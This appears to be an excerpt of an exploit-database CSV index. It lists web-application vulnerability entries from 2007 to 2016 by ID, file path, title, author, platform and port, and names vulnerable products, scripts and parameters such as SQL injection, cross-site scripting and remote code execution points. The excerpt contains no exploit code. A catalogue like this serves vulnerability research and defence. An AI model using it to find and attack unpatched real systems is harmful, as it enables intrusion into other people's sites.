+34077,exploits/php/webapps/34077.txt,"TPO Duyuru Scripti - Insecure Cookie Authentication Bypass",2010-06-02,Septemb0x,webapps,php, +34078,exploits/php/webapps/34078.txt,"PHP City Portal 1.3 - 'cms_data.php' Cross-Site Scripting",2010-06-02,Red-D3v1L,webapps,php, +34079,exploits/php/webapps/34079.txt,"Sniggabo CMS 2.21 - 'search.php' Cross-Site Scripting",2010-01-06,Sora,webapps,php, +34080,exploits/cgi/webapps/34080.txt,"MoinMoin 1.x - 'PageEditor.py' Cross-Site Scripting",2010-06-03,anonymous,webapps,cgi, +34081,exploits/php/webapps/34081.txt,"KubeLabs PHPDug 2.0 - 'upcoming.php' Cross-Site Scripting",2010-01-06,indoushka,webapps,php, +34082,exploits/php/webapps/34082.txt,"Obsession-Design Image-Gallery 1.1 - 'display.php' Cross-Site Scripting",2010-01-02,kaMtiEz,webapps,php, +34083,exploits/php/webapps/34083.txt,"Western Digital My Book World Edition 1.1.16 - 'lang' Cross-Site Scripting",2009-12-30,emgent,webapps,php, +34084,exploits/php/webapps/34084.txt,"L2Web LineWeb 1.0.5 - Multiple Input Validation Vulnerabilities",2010-01-06,"Ignacio Garrido",webapps,php, +34085,exploits/php/webapps/34085.txt,"WordPress Plugin Gigya Socialize 1.0/1.1.x - Cross-Site Scripting",2010-06-04,MustLive,webapps,php, +40718,exploits/php/webapps/40718.txt,"SweetRice 1.5.1 - Backup Disclosure",2016-11-06,"Ashiyane Digital Security Team",webapps,php, +34089,exploits/php/webapps/34089.txt,"Bilboplanet 2.0 - Multiple Cross-Site Scripting Vulnerabilities",2014-07-16,"Vivek N",webapps,php,80 +34091,exploits/php/webapps/34091.txt,"Pay Per Minute Video Chat Script 2.x - SQL Injection / Multiple Cross-Site Scripting Vulnerabilities",2010-01-04,R3d-D3V!L,webapps,php, +34092,exploits/jsp/webapps/34092.txt,"JForum 2.1.8 - 'bookmarks' Module Multiple HTML Injection Vulnerabilities",2010-06-06,"Adam Baldwin",webapps,jsp, +34095,exploits/php/webapps/34095.txt,"PonVFTP - 'login.php' SQL Injection",2010-01-15,S2K9,webapps,php, +34096,exploits/php/webapps/34096.txt,"CuteSITE CMS 1.x - '/manage/add_user.php?user_id' SQL Injection",2010-06-06,"High-Tech Bridge SA",webapps,php, +34097,exploits/php/webapps/34097.txt,"CuteSITE CMS 1.x - '/manage/main.php?fld_path' Cross-Site Scripting",2010-06-06,"High-Tech Bridge SA",webapps,php, +34155,exploits/php/webapps/34155.txt,"Ceica-GW - 'login.php' Cross-Site Scripting",2010-06-27,indoushka,webapps,php, +34157,exploits/php/webapps/34157.txt,"Firebook - Multiple Cross-Site Scripting / Directory Traversal Vulnerabilities",2010-06-17,MustLive,webapps,php, +34116,exploits/php/webapps/34116.txt,"Bits Video Script 2.05 Gold Beta - 'showcasesearch.php?rowptem[template]' Remote File Inclusion",2010-01-18,indoushka,webapps,php, +34117,exploits/php/webapps/34117.txt,"Bits Video Script 2.05 Gold Beta - 'showcase2search.php?rowptem[template]' Remote File Inclusion",2010-01-18,indoushka,webapps,php, +34118,exploits/php/webapps/34118.txt,"Hitmaaan Gallery 1.3 - Multiple Cross-Site Scripting Vulnerabilities",2010-01-18,indoushka,webapps,php, +34119,exploits/php/webapps/34119.txt,"Bits Video Script 2.04/2.05 - '/addvideo.php' Arbitrary File Upload / Arbitrary PHP Code Execution",2010-01-18,indoushka,webapps,php, +34120,exploits/php/webapps/34120.txt,"Bits Video Script 2.04/2.05 - '/register.php' Arbitrary File Upload / Arbitrary PHP Code Execution",2010-01-18,indoushka,webapps,php, +34121,exploits/php/webapps/34121.txt,"Bits Video Script 2.04/2.05 - 'search.php' Cross-Site Scripting",2010-01-18,indoushka,webapps,php, +34341,exploits/php/webapps/34341.txt,"WX-Guestbook 1.1.208 - SQL Injection / HTML Injection",2009-09-21,learn3r,webapps,php, +34342,exploits/php/webapps/34342.txt,"Ez Poll Hoster - Multiple Cross-Site Scripting Vulnerabilities",2009-12-14,"Milos Zivanovic",webapps,php, +34100,exploits/php/webapps/34100.txt,"Omeka 2.2 - Cross-Site Request Forgery / Persistent Cross-Site Scripting",2014-07-17,LiquidWorm,webapps,php,80 +40296,exploits/php/webapps/40296.txt,"FreePBX 13.0.35 - Remote Command Execution",2016-08-29,0x4148,webapps,php, +34140,exploits/php/webapps/34140.txt,"AneCMS 1.x - '/modules/blog/index.php' HTML Injection",2010-06-11,"High-Tech Bridge SA",webapps,php, +34113,exploits/php/webapps/34113.py,"Silverstripe CMS 2.4 - File Renaming Security Bypass",2010-06-09,"John Leitch",webapps,php, +34105,exploits/php/webapps/34105.txt,"WordPress Plugin Gallery Objects 0.4 - SQL Injection",2014-07-18,"Claudio Viviani",webapps,php,80 +34106,exploits/php/webapps/34106.txt,"cPanel 11.25 Image Manager - 'target' Local File Inclusion",2010-06-07,"AnTi SeCuRe",webapps,php, +34107,exploits/php/webapps/34107.txt,"BoastMachine 3.1 - 'key' Cross-Site Scripting",2010-06-07,"High-Tech Bridge SA",webapps,php, +34108,exploits/java/webapps/34108.txt,"PRTG Traffic Grapher 6.2.1 - 'url' Cross-Site Scripting",2009-01-08,"Patrick Webster",webapps,java, +34109,exploits/php/webapps/34109.html,"log1 CMS 2.0 - Session Handling Remote Security Bypass / Remote File Inclusion",2010-06-03,"High-Tech Bridge SA",webapps,php, +34110,exploits/php/webapps/34110.txt,"PGAUTOPro - SQL Injection / Cross-Site Scripting (2)",2010-06-09,Sid3^effects,webapps,php, +34111,exploits/multiple/webapps/34111.txt,"(GREEZLE) Global Real Estate Agent Login - Multiple SQL Injections",2010-06-09,"L0rd CrusAd3r",webapps,multiple, +34339,exploits/php/webapps/34339.txt,"Pligg CMS 1.0.4 - 'search.php' Cross-Site Scripting",2010-07-15,"High-Tech Bridge SA",webapps,php, +34124,exploits/php/webapps/34124.txt,"WordPress Plugin WP BackupPlus - Database and Files Backup Download",2014-07-20,pSyCh0_3D,webapps,php, +34130,exploits/linux/webapps/34130.rb,"Raritan PowerIQ 4.1.0 - SQL Injection (Metasploit)",2014-07-21,"Brandon Perry",webapps,linux,80 +34127,exploits/php/webapps/34127.txt,"Arab Portal 2.2 - 'members.php' SQL Injection",2010-06-10,SwEET-DeViL,webapps,php, +34128,exploits/hardware/webapps/34128.py,"MTS MBlaze Ultra Wi-Fi / ZTE AC3633 - Multiple Vulnerabilities",2014-07-21,"Ajin Abraham",webapps,hardware,80 +34161,exploits/php/webapps/34161.txt,"WordPress Plugin Video Gallery 2.5 - Multiple Vulnerabilities",2014-07-24,"Claudio Viviani",webapps,php,80 +34149,exploits/hardware/webapps/34149.txt,"NETGEAR DGN2200 1.0.0.29_1.7.29_HotS - Password Disclosure",2014-07-23,"Dolev Farhi",webapps,hardware, +34159,exploits/php/webapps/34159.txt,"Joomla! Component Gallery XML 1.1 - SQL Injection / Local File Inclusion",2010-06-18,jdc,webapps,php, +34163,exploits/hardware/webapps/34163.txt,"Lian Li NAS - Multiple Vulnerabilities",2014-07-24,pws,webapps,hardware, +34165,exploits/multiple/webapps/34165.txt,"Zenoss Monitoring System 4.2.5-2108 (x64) - Persistent Cross-Site Scripting",2014-07-25,"Dolev Farhi",webapps,multiple, +34166,exploits/php/webapps/34166.txt,"KubeSupport - 'lang' SQL Injection",2010-06-18,"L0rd CrusAd3r",webapps,php, +34168,exploits/php/webapps/34168.py,"Pligg CMS 2.0.1 - Multiple Vulnerabilities",2014-07-25,BlackHawk,webapps,php,80 +34169,exploits/php/webapps/34169.txt,"Moodle 2.7 - Persistent Cross-Site Scripting",2014-07-27,"Osanda Malith",webapps,php, +34170,exploits/php/webapps/34170.txt,"ZeroCMS 1.0 - Persistent Cross-Site Scripting",2014-07-27,"Mayuresh Dani",webapps,php, +34173,exploits/php/webapps/34173.txt,"DirPHP 1.0 - Local File Inclusion",2014-07-27,"black hat",webapps,php, +34175,exploits/php/webapps/34175.txt,"SaffaTunes CMS - 'news.php' Multiple SQL Injections",2010-06-21,"Th3 RDX",webapps,php, +34176,exploits/php/webapps/34176.html,"osCMax 2.0 - 'articles.php' Cross-Site Scripting",2010-06-21,"High-Tech Bridge SA",webapps,php, +34177,exploits/php/webapps/34177.txt,"Sigmer Technologies Scribe CMS - 'copy_folder.php' Cross-Site Scripting",2010-06-21,"High-Tech Bridge SA",webapps,php, +34179,exploits/jsp/webapps/34179.txt,"IBM Websphere ILOG JRules 6.7 - Cross-Site Scripting",2010-06-21,IBM,webapps,jsp, +34180,exploits/asp/webapps/34180.txt,"webConductor - 'default.asp' SQL Injection",2010-06-22,"Th3 RDX",webapps,asp, +34181,exploits/php/webapps/34181.txt,"SoftComplex PHP Event Calendar 1.5 - Multiple Remote Vulnerabilities",2010-06-22,cp77fk4r,webapps,php, +34183,exploits/php/webapps/34183.txt,"Jamroom 4.0.2/4.1.x - 'forum.php' Cross-Site Scripting",2010-06-21,"High-Tech Bridge SA",webapps,php, +34185,exploits/php/webapps/34185.txt,"PreProject Multi-Vendor Shopping Malls - 'products.php' SQL Injection",2010-06-23,CoBRa_21,webapps,php, +34187,exploits/hardware/webapps/34187.txt,"Ubiquiti UbiFi / mFi / AirVision - Cross-Site Request Forgery",2014-07-28,"Seth Art",webapps,hardware,80 +34190,exploits/php/webapps/34190.txt,"Oxwall 1.7.0 - Multiple Cross-Site Request Forgery / HTML Injection Vulnerabilities",2014-07-28,LiquidWorm,webapps,php,80 +34194,exploits/asp/webapps/34194.txt,"Lois Software WebDB 2.0A Script - Multiple SQL Injections",2010-06-24,"High-Tech Bridge SA",webapps,asp, +34195,exploits/php/webapps/34195.txt,"WordPress Plugin Cimy Counter 0.9.4 - HTTP Response Splitting / Cross-Site Scripting",2010-05-05,MustLive,webapps,php, +34196,exploits/ios/webapps/34196.txt,"WiFi HD 7.3.0 iOS - Multiple Vulnerabilities",2014-07-29,Vulnerability-Lab,webapps,ios, +34197,exploits/php/webapps/34197.txt,"AbleSpace 1.0 - 'news.php' SQL Injection",2010-06-25,JaMbA,webapps,php, +34198,exploits/php/webapps/34198.txt,"Limny 2.1 - 'q' Cross-Site Scripting",2010-06-24,"High-Tech Bridge SA",webapps,php, +34204,exploits/php/webapps/34204.html,"SkaDate Lite 2.0 - Multiple Cross-Site Request Forgery / Persistent Cross-Site Scripting Vulnerabilities",2014-07-30,LiquidWorm,webapps,php,80 +34205,exploits/php/webapps/34205.py,"SkaDate Lite 2.0 - Remote Code Execution",2014-07-30,LiquidWorm,webapps,php,80 +34206,exploits/hardware/webapps/34206.txt,"D-Link AP 3200 - Multiple Vulnerabilities",2014-07-30,pws,webapps,hardware,80 +34207,exploits/php/webapps/34207.txt,"Customer Paradigm PageDirector - 'id' SQL Injection",2010-06-28,Tr0y-x,webapps,php, +34209,exploits/php/webapps/34209.txt,"BlaherTech Placeto CMS - 'Username' SQL Injection",2010-06-28,S.W.T,webapps,php, +34210,exploits/php/webapps/34210.txt,"OneCMS 2.6.1 - 'cat' Cross-Site Scripting",2010-06-24,"High-Tech Bridge SA",webapps,php, +34211,exploits/php/webapps/34211.html,"OneCMS 2.6.1 - 'search' SQL Injection",2010-06-24,"High-Tech Bridge SA",webapps,php, +34212,exploits/php/webapps/34212.html,"OneCMS 2.6.1 - 'short1' Cross-Site Scripting",2010-06-24,"High-Tech Bridge SA",webapps,php, +34213,exploits/php/webapps/34213.txt,"PHP Bible Search - 'bible.php?chapter' SQL Injection",2010-06-29,"L0rd CrusAd3r",webapps,php, +34214,exploits/php/webapps/34214.txt,"PHP Bible Search - 'bible.php?chapter' Cross-Site Scripting",2010-06-29,"L0rd CrusAd3r",webapps,php, +34215,exploits/php/webapps/34215.txt,"MySpace Clone 2010 - SQL Injection / Cross-Site Scripting",2010-06-28,"L0rd CrusAd3r",webapps,php, +34216,exploits/php/webapps/34216.txt,"eBay Clone Script 2010 - 'showcategory.php' SQL Injection",2010-06-28,"L0rd CrusAd3r",webapps,php, +34217,exploits/php/webapps/34217.txt,"Clix'N'Cash Clone 2010 - 'index.php' SQL Injection",2010-06-28,"L0rd CrusAd3r",webapps,php, +34218,exploits/php/webapps/34218.txt,"V-EVA Classified Script 5.1 - 'classified_img.php' SQL Injection",2010-06-28,Sid3^effects,webapps,php, +34219,exploits/php/webapps/34219.txt,"CANDID - '/image/view.php?image_id' SQL Injection",2010-06-29,"L0rd CrusAd3r",webapps,php, +34220,exploits/php/webapps/34220.txt,"CANDID - '/image/view.php?image_id' Cross-Site Scripting",2010-06-29,"L0rd CrusAd3r",webapps,php, +34221,exploits/asp/webapps/34221.txt,"Iatek PortalApp 3.3/4.0 - 'login.asp' Multiple Cross-Site Scripting Vulnerabilities",2010-06-29,"High-Tech Bridge SA",webapps,asp, +34222,exploits/php/webapps/34222.html,"Grafik CMS - '/admin.php' SQL Injection / Cross-Site Scripting",2010-06-29,"High-Tech Bridge SA",webapps,php, +34223,exploits/cgi/webapps/34223.txt,"Miyabi CGI Tools 1.02 - 'index.pl' Remote Command Execution",2010-06-29,"Marshall Whittaker",webapps,cgi, +34224,exploits/multiple/webapps/34224.txt,"Kryn.cms 6.0 - Cross-Site Request Forgery / HTML Injection",2010-06-29,TurboBorland,webapps,multiple, +34225,exploits/php/webapps/34225.txt,"TornadoStore 1.4.3 - SQL Injection / HTML Injection",2010-06-29,"Lucas Apa",webapps,php, +34226,exploits/php/webapps/34226.txt,"System CMS Contentia - 'news.php' SQL Injection",2010-06-30,GlaDiaT0R,webapps,php, +34229,exploits/php/webapps/34229.txt,"ArcademSX 2.904 - 'cat' Cross-Site Scripting",2010-06-29,"Th3 RDX",webapps,php, +34231,exploits/php/webapps/34231.txt,"LiveZilla 3.1.8.3 - Multiple Cross-Site Scripting Vulnerabilities",2009-12-30,MaXe,webapps,php, +34232,exploits/php/webapps/34232.txt,"DPScms - 'q' SQL Injection / Cross-Site Scripting",2010-07-01,Ariko-Security,webapps,php, +34234,exploits/php/webapps/34234.txt,"Flatnux 2010-06.09 - 'find' Cross-Site Scripting",2010-07-01,ITSecTeam,webapps,php, +34235,exploits/php/webapps/34235.txt,"Wiki Web Help 0.2.7 - Cross-Site Scripting / HTML Injection",2010-07-01,"John Leitch",webapps,php, +34236,exploits/php/webapps/34236.txt,"ReCMS - 'users_lang' Directory Traversal",2010-07-01,Locu,webapps,php, +34237,exploits/multiple/webapps/34237.txt,"Xplico 0.5.7 - 'add.ctp' Cross-Site Scripting (2)",2010-07-02,"Marcos Garcia & Maximiliano Soler",webapps,multiple, +34238,exploits/php/webapps/34238.txt,"Sphider Search Engine - Multiple Vulnerabilities",2014-08-02,"Shayan S",webapps,php,80 +34239,exploits/php/webapps/34239.txt,"Status2k Server Monitoring Software - Multiple Vulnerabilities",2014-08-02,"Shayan S",webapps,php,80 +34240,exploits/ios/webapps/34240.txt,"TigerCom iFolder+ 1.2 iOS - Multiple Vulnerabilities",2014-08-02,Vulnerability-Lab,webapps,ios,8080 +34241,exploits/linux/webapps/34241.txt,"ISPConfig 3.0.54p1 - Authenticated Admin Privilege Escalation",2014-08-02,mra,webapps,linux,8080 +34336,exploits/php/webapps/34336.html,"WordPress Plugin Disqus 2.7.5 - Cross-Site Request Forgery (Admin Persistent) / Cross-Site Scripting",2014-08-14,"Nik Cubrilovic",webapps,php,80 +34337,exploits/php/webapps/34337.txt,"Gekko Web Builder 9.0 - 'index.php' Cross-Site Scripting",2010-07-15,"High-Tech Bridge SA",webapps,php, +34338,exploits/php/webapps/34338.html,"Pixie 1.0.4 - HTML Injection / Cross-Site Scripting",2010-07-15,"High-Tech Bridge SA",webapps,php, +34243,exploits/ios/webapps/34243.txt,"Photo WiFi Transfer 1.01 - Directory Traversal",2014-08-02,Vulnerability-Lab,webapps,ios,8080 +34245,exploits/php/webapps/34245.txt,"ArticleFR 11.06.2014 - 'data.php' Privilege Escalation",2014-08-02,"High-Tech Bridge SA",webapps,php,80 +34246,exploits/php/webapps/34246.txt,"AL-Caricatier 2.5 - 'comment.php' Cross-Site Scripting",2009-12-25,indoushka,webapps,php, +34250,exploits/php/webapps/34250.txt,"Joomla! Component Canteen 1.0 - Local File Inclusion",2010-07-05,Drosophila,webapps,php, +34252,exploits/php/webapps/34252.txt,"i-Net Solution Matrimonial Script 2.0.3 - 'alert.php' Cross-Site Scripting",2010-07-06,"Andrea Bocchetti",webapps,php, +34253,exploits/php/webapps/34253.txt,"Orbis CMS 1.0.2 - 'editor-body.php' Cross-Site Scripting",2010-07-05,"John Leitch",webapps,php, +34254,exploits/hardware/webapps/34254.txt,"TP-Link TL-WR740N v4 Router (FW-Ver. 3.16.6 Build 130529 Rel.47286n) - Command Execution",2014-08-03,"Christoph Kuhl",webapps,hardware, +34255,exploits/php/webapps/34255.html,"cPanel 11.25 - Cross-Site Request Forgery",2010-07-03,G0D-F4Th3r,webapps,php, +34256,exploits/php/webapps/34256.py,"SocialABC NetworX 1.0.3 - Arbitrary File Upload / Cross-Site Scripting",2010-07-05,"John Leitch",webapps,php, +34257,exploits/php/webapps/34257.txt,"NTSOFT BBS E-Market Professional - Multiple Cross-Site Scripting Vulnerabilities (2)",2010-07-06,"Ivan Sanchez",webapps,php, +34258,exploits/php/webapps/34258.txt,"NewsOffice 2.0.18 - 'news_show.php' Cross-Site Scripting",2010-07-05,"John Leitch",webapps,php, +34259,exploits/php/webapps/34259.txt,"Bitweaver 2.7 - 'fImg' Cross-Site Scripting",2010-07-05,"John Leitch",webapps,php, +34260,exploits/php/webapps/34260.txt,"odCMS 1.07 - 'archive.php' Cross-Site Scripting",2010-07-05,"John Leitch",webapps,php, +34263,exploits/ios/webapps/34263.txt,"Video WiFi Transfer 1.01 - Directory Traversal",2014-08-04,Vulnerability-Lab,webapps,ios,8080 +34264,exploits/ios/webapps/34264.txt,"FreeDisk 1.01 iOS - Multiple Vulnerabilities",2014-08-04,Vulnerability-Lab,webapps,ios,8080 +34265,exploits/php/webapps/34265.txt,"Exponent CMS 0.97 - 'Slideshow.js.php' Cross-Site Scripting",2010-07-07,"Andrei Rimsa Alvares",webapps,php, +34266,exploits/php/webapps/34266.txt,"RunCMS 2.1 - 'check.php' Cross-Site Scripting",2010-07-07,"Andrei Rimsa Alvares",webapps,php, +34268,exploits/php/webapps/34268.txt,"Worxware DCP-Portal 7.0 - Multiple Cross-Site Scripting Vulnerabilities",2010-07-07,"Andrei Rimsa Alvares",webapps,php, +34273,exploits/php/webapps/34273.txt,"HybridAuth 2.2.2 - Remote Code Execution",2014-08-06,@u0x,webapps,php,80 +34275,exploits/php/webapps/34275.txt,"Pro Chat Rooms 8.2.0 - Multiple Vulnerabilities",2014-08-06,"Mike Manzotti",webapps,php,80 +34277,exploits/php/webapps/34277.txt,"Feng Office - Persistent Cross-Site Scripting",2014-08-06,"Juan Sacco",webapps,php, +34527,exploits/windows/webapps/34527.c,"Acunetix Web Vulnerability Scanner - DLL Loading Arbitrary Code Execution",2010-08-25,Kolor,webapps,windows, +34280,exploits/php/webapps/34280.txt,"phpFaber CMS 2.0.5 - Multiple Cross-Site Scripting Vulnerabilities",2010-07-04,prodigy,webapps,php, +34282,exploits/php/webapps/34282.txt,"Real Estate Manager 1.0.1 - 'index.php' Cross-Site Scripting",2010-07-09,bi0,webapps,php, +34283,exploits/php/webapps/34283.txt,"Model Agency Manager - 'search_process.php' Cross-Site Scripting",2009-12-13,bi0,webapps,php, +34284,exploits/php/webapps/34284.txt,"osCSS 1.2.2 - 'page' Cross-Site Scripting",2010-07-08,"High-Tech Bridge SA",webapps,php, +34285,exploits/php/webapps/34285.txt,"Articlems 2.0 - 'c[]' Cross-Site Scripting",2010-12-13,Packetdeath,webapps,php, +34286,exploits/php/webapps/34286.txt,"SimpNews 2.47.3 - Multiple Cross-Site Scripting Vulnerabilities",2010-07-09,MustLive,webapps,php, +34287,exploits/php/webapps/34287.txt,"Yappa 3.1.2 - 'yappa.php' Multiple Remote Command Execution Vulnerabilities",2010-07-09,"Sn!pEr.S!Te Hacker",webapps,php, +34288,exploits/php/webapps/34288.txt,"pragmaMX 0.1.11 - 'modules.php' Multiple SQL Injections",2009-12-22,"Hadi Kiamarsi",webapps,php, +34289,exploits/php/webapps/34289.txt,"Web Cocoon simpleCMS - 'show.php' SQL Injection",2009-12-21,anonymous,webapps,php, +34290,exploits/java/webapps/34290.txt,"Mac's CMS 1.1.4 - 'SearchString' Cross-Site Scripting",2010-07-11,10n1z3d,webapps,java, +34291,exploits/php/webapps/34291.txt,"Joomla! Component Rapid-Recipe - HTML Injection",2010-07-10,Sid3^effects,webapps,php, +34292,exploits/php/webapps/34292.txt,"eliteCMS 1.01 - Multiple Cross-Site Scripting Vulnerabilities",2010-07-10,10n1z3d,webapps,php, +34293,exploits/java/webapps/34293.txt,"dotDefender 4.02 - 'clave' Cross-Site Scripting",2010-07-12,"David K",webapps,java, +34294,exploits/php/webapps/34294.txt,"WordPress Plugin Firestats 1.6.5 - Multiple Cross-Site Scripting Vulnerabilities",2010-07-09,"Jelmer de Hen",webapps,php, +34295,exploits/php/webapps/34295.txt,"RunCMS 2.1 - 'magpie_debug.php' Cross-Site Scripting",2010-07-11,"John Leitch",webapps,php, +34296,exploits/php/webapps/34296.txt,"CSSTidy 1.3 - 'css_optimiser.php' Cross-Site Scripting",2010-07-11,"John Leitch",webapps,php, +34298,exploits/php/webapps/34298.py,"CMS Made Simple Module Download Manager 1.4.1 - Arbitrary File Upload",2010-07-11,"John Leitch",webapps,php, +34299,exploits/php/webapps/34299.py,"CMS Made Simple 1.8 - 'default_cms_lang' Local File Inclusion",2010-07-11,"John Leitch",webapps,php, +34300,exploits/php/webapps/34300.py,"CMS Made Simple Module Antz Toolkit 1.02 - Arbitrary File Upload",2010-07-11,"John Leitch",webapps,php, +34302,exploits/php/webapps/34302.txt,"Diem 5.1.2 - Multiple Cross-Site Scripting Vulnerabilities",2010-07-13,"High-Tech Bridge SA",webapps,php, +34303,exploits/ios/webapps/34303.txt,"PhotoSync Wifi & Bluetooth 1.0 - Local File Inclusion",2014-08-09,Vulnerability-Lab,webapps,ios,8000 +34305,exploits/ios/webapps/34305.txt,"Easy FTP Pro 4.2 iOS - Command Injection",2014-08-09,Vulnerability-Lab,webapps,ios,8080 +34308,exploits/php/webapps/34308.txt,"TomatoCart 1.x - SQL Injection",2014-08-09,Breaking.Technology,webapps,php,80 +34315,exploits/php/webapps/34315.txt,"The Next Generation of Genealogy Sitebuilding - 'searchform.php' Cross-Site Scripting",2009-12-14,bi0,webapps,php, +34317,exploits/php/webapps/34317.txt,"WS Interactive Automne 4.0 - '228-recherche.php' Cross-Site Scripting",2009-12-13,loneferret,webapps,php, +34318,exploits/php/webapps/34318.txt,"Zeecareers 2.0 - Cross-Site Scripting / Authentication Bypass",2009-12-13,bi0,webapps,php, +34319,exploits/php/webapps/34319.txt,"Ez Cart - 'index.php' Cross-Site Scripting",2009-12-14,anti-gov,webapps,php, +34321,exploits/php/webapps/34321.txt,"Spitfire 1.0.381 - Cross-Site Scripting / Cross-Site Request Forgery",2010-07-15,"Nijel the Destroyer",webapps,php, +34322,exploits/php/webapps/34322.txt,"PHPWCMS 1.4.5 - 'PHPwcms.php' Cross-Site Scripting",2010-07-15,"High-Tech Bridge SA",webapps,php, +34323,exploits/php/webapps/34323.html,"DSite CMS 4.81 - 'modmenu.php' Cross-Site Scripting",2010-07-15,"High-Tech Bridge SA",webapps,php, +34324,exploits/php/webapps/34324.txt,"FestOS 2.3 - 'contents' Cross-Site Scripting",2010-07-15,"High-Tech Bridge SA",webapps,php, +34499,exploits/php/webapps/34499.txt,"ViArt Helpdesk - 'products_search.php?search_category_id' Cross-Site Scripting",2009-08-10,Moudi,webapps,php, +34343,exploits/asp/webapps/34343.txt,"MOJO IWms 7 - 'default.asp' Cookie Manipulation",2007-12-17,cp77fk4r,webapps,asp, +34344,exploits/asp/webapps/34344.txt,"Pre Jobo.NET - Multiple SQL Injections",2009-12-17,bi0,webapps,asp, +34345,exploits/java/webapps/34345.txt,"jCore - 'search' Cross-Site Scripting",2009-12-17,loneferret,webapps,java, +34347,exploits/cgi/webapps/34347.txt,"iOffice 0.1 - 'parametre' Remote Command Execution",2010-07-18,"Marshall Whittaker",webapps,cgi, +34349,exploits/php/webapps/34349.txt,"YACS CMS 10.5.27 - 'context[path_to_root]' Remote File Inclusion",2010-07-18,eidelweiss,webapps,php, +34350,exploits/php/webapps/34350.txt,"Sourcefabric Campsite Articles - HTML Injection",2010-07-15,D4rk357,webapps,php, +34351,exploits/php/webapps/34351.html,"BOLDfx eUploader 3.1.1 - 'admin.php' Multiple Remote Vulnerabilities",2009-12-16,"Milos Zivanovic",webapps,php, +34352,exploits/php/webapps/34352.html,"BOLDfx Recipe Script 5.0 - Multiple Remote Vulnerabilities",2009-12-16,"Milos Zivanovic",webapps,php, +34353,exploits/php/webapps/34353.txt,"SnowFlake CMS 0.9.5 Beta - 'uid' SQL Injection",2010-07-19,"Dinesh Arora",webapps,php, +34354,exploits/php/webapps/34354.txt,"TenderSystem 0.9.5 - 'main.php' Multiple Local File Inclusions",2009-12-14,Packetdeath,webapps,php, +34357,exploits/php/webapps/34357.txt,"Scriptsez Ez FAQ Maker 1.0 - Cross-Site Scripting / Cross-Site Request Forgery",2009-12-15,"Milos Zivanovic",webapps,php, +34361,exploits/hardware/webapps/34361.txt,"Tenda A5s Router 3.02.05_CN - Authentication Bypass",2014-08-18,zixian,webapps,hardware,80 +34365,exploits/php/webapps/34365.txt,"Claus Muus Spitfire 1.0.336 - Multiple Cross-Site Scripting Vulnerabilities",2010-07-22,"High-Tech Bridge SA",webapps,php, +34366,exploits/php/webapps/34366.txt,"Stratek Web Design Twilight CMS 4.0 - 'calendar' Cross-Site Scripting",2009-11-02,"Vladimir Vorontsov",webapps,php, +34367,exploits/php/webapps/34367.txt,"Piwigo 2.0 - 'comments.php' Multiple Cross-Site Scripting Vulnerabilities",2009-10-28,"Andrew Paterson",webapps,php, +34370,exploits/jsp/webapps/34370.txt,"SAP NetWeaver 6.4/7.0 - 'wsnavigator' Cross-Site Scripting",2010-07-23,"Alexandr Polyakov",webapps,jsp, +34373,exploits/php/webapps/34373.txt,"MC Content Manager 10.1 - SQL Injection / Cross-Site Scripting",2010-07-25,MustLive,webapps,php, +34374,exploits/php/webapps/34374.txt,"Joomla! Component FreiChat 1.0/2.x - HTML Injection",2010-07-26,nag_sunny,webapps,php, +34376,exploits/asp/webapps/34376.txt,"e-Courier CMS - 'UserGUID' Multiple Cross-Site Scripting Vulnerabilities",2009-10-06,BugsNotHugs,webapps,asp, +34377,exploits/php/webapps/34377.txt,"Portili Personal and Team Wiki 1.14 - Multiple Vulnerabilities (2)",2010-10-04,Abysssec,webapps,php, +34378,exploits/php/webapps/34378.txt,"Clixint Technologies DPI - Cross-Site Scripting",2009-12-04,anonymous,webapps,php, +34379,exploits/php/webapps/34379.html,"SyndeoCMS 2.9 - Multiple HTML Injection Vulnerabilities",2010-07-26,"High-Tech Bridge SA",webapps,php, +34380,exploits/asp/webapps/34380.txt,"Active Business Directory 2 - 'searchadvance.asp' Cross-Site Scripting",2009-12-22,"Andrea Bocchetti",webapps,asp, +34381,exploits/php/webapps/34381.txt,"MyBB 1.8 Beta 3 - Multiple Vulnerabilities",2014-08-21,"DemoLisH B3yaZ",webapps,php, +34466,exploits/php/webapps/34466.txt,"CMS Source - Multiple Input Validation Vulnerabilities",2010-08-13,"High-Tech Bridge SA",webapps,php, +34383,exploits/php/webapps/34383.txt,"Social Media - 'index.php' Local File Inclusion",2010-07-27,"Harri Johansson",webapps,php, +34384,exploits/jsp/webapps/34384.txt,"Jira 4.0.1 - Cross-Site Scripting / Information Disclosure",2010-07-28,MaXe,webapps,jsp, +34386,exploits/php/webapps/34386.txt,"Cetera eCommerce - Multiple SQL Injections",2010-07-28,MustLive,webapps,php, +34387,exploits/php/webapps/34387.txt,"Cetera eCommerce - Multiple Cross-Site Scripting / HTML Injection Vulnerabilities",2010-07-28,MustLive,webapps,php, +34388,exploits/php/webapps/34388.txt,"SPIP 2.1 - 'var_login' Cross-Site Scripting",2010-07-28,dotsafe.fr,webapps,php, +34389,exploits/php/webapps/34389.txt,"Impact Software AdPeeps - Cross-Site Scripting / HTML Injection",2010-07-27,Matt,webapps,php, +34391,exploits/php/webapps/34391.txt,"Sourcefabric Campsite - Multiple Cross-Site Scripting Vulnerabilities",2010-07-30,"High-Tech Bridge SA",webapps,php, +34392,exploits/php/webapps/34392.txt,"MyIT CRM - 'index.php' Multiple Cross-Site Scripting Vulnerabilities",2010-08-02,"Juan Manuel Garcia",webapps,php, +34393,exploits/php/webapps/34393.txt,"Joomla! Component com_jigsaw - 'Controller' Directory Traversal",2010-08-03,FL0RiX,webapps,php, +34396,exploits/php/webapps/34396.txt,"FuseTalk 3.2/4.0 - Multiple Cross-Site Scripting Vulnerabilities",2010-07-03,"Juan Manuel Garcia",webapps,php, +34397,exploits/asp/webapps/34397.txt,"Activedition - '/activedition/aelogin.asp' Multiple Cross-Site Scripting Vulnerabilities",2009-09-25,"Richard Brain",webapps,asp, +34497,exploits/php/webapps/34497.txt,"ViArt Helpdesk - 'reviews.php?category_id' Cross-Site Scripting",2009-08-10,Moudi,webapps,php, +34498,exploits/php/webapps/34498.txt,"ViArt Helpdesk - 'forum.php?forum_id' Cross-Site Scripting",2009-08-10,Moudi,webapps,php, +34400,exploits/php/webapps/34400.txt,"RaidenTunes - 'music_out.php' Cross-Site Scripting",2014-08-03,LiquidWorm,webapps,php, +34401,exploits/php/webapps/34401.txt,"PHP168 Template Editor - 'Filename' Directory Traversal",2009-10-04,esnra,webapps,php, +34402,exploits/php/webapps/34402.txt,"OpenSolution Quick.Cart - Local File Inclusion / Cross-Site Scripting",2009-10-08,kl3ryk,webapps,php, 